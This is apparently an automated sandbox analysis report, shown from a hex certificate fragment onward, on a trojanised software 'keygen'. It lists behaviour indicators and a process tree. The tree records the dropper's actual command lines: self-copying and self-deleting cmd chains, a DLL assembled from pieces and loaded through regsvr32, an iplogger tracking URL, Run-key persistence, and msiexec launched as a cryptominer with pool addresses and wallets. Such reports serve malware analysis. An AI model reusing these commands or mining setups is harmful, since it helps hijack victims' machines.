551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e keygen-step-6.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 2104 PING.EXE 2852 PING.EXE -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 1548 key.exe 1548 key.exe 2468 WerFault.exe 2468 WerFault.exe 2468 WerFault.exe 2468 WerFault.exe 2468 WerFault.exe 2468 WerFault.exe 744 AddInProcess32.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2468 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 38 IoCs
description pid Process Token: SeDebugPrivilege 1612 taskkill.exe Token: SeImpersonatePrivilege 1548 key.exe Token: SeTcbPrivilege 1548 key.exe Token: SeChangeNotifyPrivilege 1548 key.exe Token: SeCreateTokenPrivilege 1548 key.exe Token: SeBackupPrivilege 1548 key.exe Token: SeRestorePrivilege 1548 key.exe Token: SeIncreaseQuotaPrivilege 1548 key.exe Token: SeAssignPrimaryTokenPrivilege 1548 key.exe Token: SeImpersonatePrivilege 1548 key.exe Token: SeTcbPrivilege 1548 key.exe Token: SeChangeNotifyPrivilege 1548 key.exe Token: SeCreateTokenPrivilege 1548 key.exe Token: SeBackupPrivilege 1548 key.exe Token: SeRestorePrivilege 1548 key.exe Token: SeIncreaseQuotaPrivilege 1548 key.exe Token: SeAssignPrimaryTokenPrivilege 1548 key.exe Token: SeImpersonatePrivilege 1548 key.exe Token: SeTcbPrivilege 1548 key.exe Token: SeChangeNotifyPrivilege 1548 key.exe Token: SeCreateTokenPrivilege 1548 key.exe Token: SeBackupPrivilege 1548 key.exe Token: SeRestorePrivilege 1548 key.exe Token: SeIncreaseQuotaPrivilege 1548 key.exe Token: SeAssignPrimaryTokenPrivilege 1548 key.exe Token: SeImpersonatePrivilege 1548 key.exe Token: SeTcbPrivilege 1548 key.exe Token: SeChangeNotifyPrivilege 1548 key.exe Token: SeCreateTokenPrivilege 1548 key.exe Token: SeBackupPrivilege 1548 key.exe Token: SeRestorePrivilege 1548 key.exe Token: SeIncreaseQuotaPrivilege 1548 key.exe Token: SeAssignPrimaryTokenPrivilege 1548 key.exe Token: SeDebugPrivilege 2396 ABCbrow.exe Token: SeLockMemoryPrivilege 2084 msiexec.exe Token: SeLockMemoryPrivilege 2084 msiexec.exe Token: SeDebugPrivilege 2468 WerFault.exe Token: SeDebugPrivilege 744 AddInProcess32.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2376 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 2376 iexplore.exe 2376 iexplore.exe 936 IEXPLORE.EXE 936 IEXPLORE.EXE 936 IEXPLORE.EXE 936 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1816 wrote to memory of 1508 1816 Ccgetmac.Version.3.9.serial.keygen.exe 29 PID 1816 wrote to memory of 1508 1816 Ccgetmac.Version.3.9.serial.keygen.exe 29 PID 1816 wrote to memory of 1508 1816 Ccgetmac.Version.3.9.serial.keygen.exe 29 PID 1816 wrote to memory of 1508 1816 Ccgetmac.Version.3.9.serial.keygen.exe 29 PID 1508 wrote to memory of 316 1508 cmd.exe 31 PID 1508 wrote to memory of 316 1508 cmd.exe 31 PID 1508 wrote to memory of 316 1508 cmd.exe 31 PID 1508 wrote to memory of 316 1508 cmd.exe 31 PID 1508 wrote to memory of 316 1508 cmd.exe 31 PID 1508 wrote to memory of 316 1508 cmd.exe 31 PID 1508 wrote to memory of 316 1508 cmd.exe 31 PID 1508 wrote to memory of 1632 1508 cmd.exe 33 PID 1508 wrote to memory of 1632 1508 cmd.exe 33 PID 1508 wrote to memory of 1632 1508 cmd.exe 33 PID 1508 wrote to memory of 1632 1508 cmd.exe 33 PID 1508 wrote to memory of 856 1508 cmd.exe 32 PID 1508 wrote to memory of 856 1508 cmd.exe 32 PID 1508 wrote to memory of 856 1508 cmd.exe 32 PID 1508 wrote to memory of 856 1508 cmd.exe 32 PID 1508 wrote to memory of 760 1508 cmd.exe 36 PID 1508 wrote to memory of 760 1508 cmd.exe 36 PID 1508 wrote to memory of 760 1508 cmd.exe 36 PID 1508 wrote to memory of 760 1508 cmd.exe 36 PID 1508 wrote to memory of 852 1508 cmd.exe 34 PID 1508 wrote to memory of 852 1508 cmd.exe 34 PID 1508 wrote to memory of 852 1508 cmd.exe 34 PID 1508 wrote to memory of 852 1508 cmd.exe 34 PID 1508 wrote to memory of 864 1508 cmd.exe 35 PID 1508 wrote to memory of 864 1508 cmd.exe 35 PID 1508 wrote to memory of 864 1508 cmd.exe 35 PID 1508 wrote to memory of 864 1508 cmd.exe 35 PID 316 wrote to memory of 1548 316 keygen-pr.exe 37 PID 316 wrote to memory of 1548 316 keygen-pr.exe 37 PID 316 wrote to memory of 1548 316 keygen-pr.exe 37 PID 316 wrote to memory of 1548 316 keygen-pr.exe 37 PID 316 wrote to memory of 1548 316 keygen-pr.exe 37 PID 316 wrote to memory of 1548 316 keygen-pr.exe 37 PID 316 wrote to memory of 1548 316 keygen-pr.exe 37 PID 856 wrote to memory of 796 856 keygen-step-5.exe 38 PID 856 wrote to memory of 796 856 keygen-step-5.exe 38 PID 856 wrote to memory of 796 856 keygen-step-5.exe 38 PID 856 wrote to memory of 796 856 keygen-step-5.exe 38 PID 864 wrote to memory of 744 864 keygen-step-4.exe 74 PID 864 wrote to memory of 744 864 keygen-step-4.exe 74 PID 864 wrote to memory of 744 864 keygen-step-4.exe 74 PID 864 wrote to memory of 744 864 keygen-step-4.exe 74 PID 796 wrote to memory of 1008 796 cmd.exe 41 PID 796 wrote to memory of 1008 796 cmd.exe 41 PID 796 wrote to memory of 1008 796 cmd.exe 41 PID 796 wrote to memory of 1008 796 cmd.exe 41 PID 796 wrote to memory of 1612 796 cmd.exe 42 PID 796 wrote to memory of 1612 796 cmd.exe 42 PID 796 wrote to memory of 1612 796 cmd.exe 42 PID 796 wrote to memory of 1612 796 cmd.exe 42 PID 1548 wrote to memory of 1720 1548 key.exe 43 PID 1548 wrote to memory of 1720 1548 key.exe 43 PID 1548 wrote to memory of 1720 1548 key.exe 43 PID 1548 wrote to memory of 1720 1548 key.exe 43 PID 1548 wrote to memory of 1720 1548 key.exe 43 PID 1548 wrote to memory of 1720 1548 key.exe 43 PID 1548 wrote to memory of 1720 1548 key.exe 43 PID 1548 wrote to memory of 1720 1548 key.exe 43 PID 1548 wrote to memory of 1720 1548 key.exe 43 PID 1548 wrote to memory of 1720 1548 key.exe 43
Processes
-
C:\Users\Admin\AppData\Local\Temp\Ccgetmac.Version.3.9.serial.keygen.exe"C:\Users\Admin\AppData\Local\Temp\Ccgetmac.Version.3.9.serial.keygen.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1816 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1508 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:316 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat5⤵
- Executes dropped EXE
PID:1720
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exekeygen-step-5.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:856 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c COPY /y "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ..\QWjHI.exe > nul&& STart ..\QWjHI.exe -p27ynDU0RROn_1Esjj_BT3 & If "" =="" for %L IN ("C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) dotaskkill /F /iM "%~NXL" > NuL4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:796 -
C:\Users\Admin\AppData\Local\Temp\QWjHI.exe..\QWjHI.exe -p27ynDU0RROn_1Esjj_BT35⤵
- Executes dropped EXE
PID:1008 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c COPY /y "C:\Users\Admin\AppData\Local\Temp\QWjHI.exe" ..\QWjHI.exe > nul&& STart ..\QWjHI.exe -p27ynDU0RROn_1Esjj_BT3 & If "-p27ynDU0RROn_1Esjj_BT3 " =="" for %L IN ("C:\Users\Admin\AppData\Local\Temp\QWjHI.exe" ) dotaskkill /F /iM "%~NXL" > NuL6⤵PID:1812
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C EcHO |SeT /p= "MZ" > VLtI.N & cOPY/B /y VLti.N+ 6wVNLNJ.QO + 6Q1e.WHX+ b~jVM.BED ..\NeNFc.Nt > Nul &stArT regsvr32 ..\NenfC.Nt /S & DeL /Q* > nuL6⤵PID:872
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "7⤵PID:2076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /p= "MZ" 1>VLtI.N"7⤵PID:2088
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 ..\NenfC.Nt /S7⤵
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
PID:2192
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /iM "keygen-step-5.exe"5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1612
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:1632
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
PID:852 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵PID:1812
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:2104
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:864 -
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Crack.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Crack.exe"4⤵PID:744
-
C:\Windows\SysWOW64\rUNdlL32.eXe"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",setuser5⤵PID:2184
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\ABCbrow.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\ABCbrow.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2396 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:744 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1uJsd76⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2376 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2376 CREDAT:275457 /prefetch:27⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:936
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\jg6_6asg.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\jg6_6asg.exe"4⤵
- Executes dropped EXE
PID:656 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 656 -s 1925⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2468
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-6.exekeygen-step-6.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:760 -
C:\Users\Admin\AppData\Roaming\9364.tmp.exe"C:\Users\Admin\AppData\Roaming\9364.tmp.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2604 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\9364.tmp.exe"5⤵PID:1584
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK6⤵
- Delays execution with timeout.exe
PID:2484
-
-
-
-
C:\Users\Admin\AppData\Roaming\B41E.tmp.exe"C:\Users\Admin\AppData\Roaming\B41E.tmp.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies system certificate store
PID:2680 -
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w399@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999995⤵PID:3028
-
-
C:\Windows\system32\msiexec.exe-o pool.minexmr.com:4444 -u 87rRyMkZM4pNgAZPi5NX3DdxksaoNgd7bZUBVe3A9uemAhxc8EQJ6dAPZg2mYTwoezgJWNfTpFFmnVYWXqcNDMhLF7ihFgM.w820 --cpu-max-threads-hint 50 -r 99995⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:2084
-
-
-
C:\Users\Admin\AppData\Roaming\B547.tmp.exe"C:\Users\Admin\AppData\Roaming\B547.tmp.exe"4⤵
- Executes dropped EXE
- Drops startup file
PID:2700
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-6.exe" >> NUL4⤵PID:2808
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
PID:2852
-
-
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-612547857-1908221211-1904713462113111153118199831921407942907-6593363391157028012"1⤵PID:2088